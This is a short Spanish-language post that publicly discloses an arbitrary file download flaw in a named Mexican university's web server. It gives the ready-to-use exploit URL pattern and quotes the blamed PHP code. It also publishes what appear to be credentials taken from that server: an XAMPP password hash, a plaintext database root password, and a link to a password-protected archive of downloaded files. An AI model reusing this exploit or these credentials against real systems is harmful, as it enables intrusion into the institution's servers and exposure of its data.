Una vulnerabilidad en el sitio web de la Universidad Autónoma del Carmen permite descargar cualquier archivo de su servidor web
http://www.campusvirtual.unacar.mx/descarga.php?f=EL ARCHIVO QUE QUIERAS DESCARGAR
Vulnerabilidad en: descarga.php (líneas 18 y 19)
$ftmp = explode(«.»,$archivo);
$fExt = strtolower($ftmp[count($ftmp)-1]);
Por ello no deben hacer copy paste de códigos en Internet si no lo entienden.
Algo de información:
Archivo xampp.users:
xampp:wWWY6N06bl1XU
Base de datos:
$servidor = «localhost»;
$usuario = «root»;
$clave = «smi3012pts»;
//$clave = «rootadmin»;
$db = «unacar_ta»;
Algunos archivos:
https://rapidshare.com/files/457646199/unacar.rar
Password: blog.puchunguis.com
TIPS: El servidor es Linux con XAMPP
){kind=link}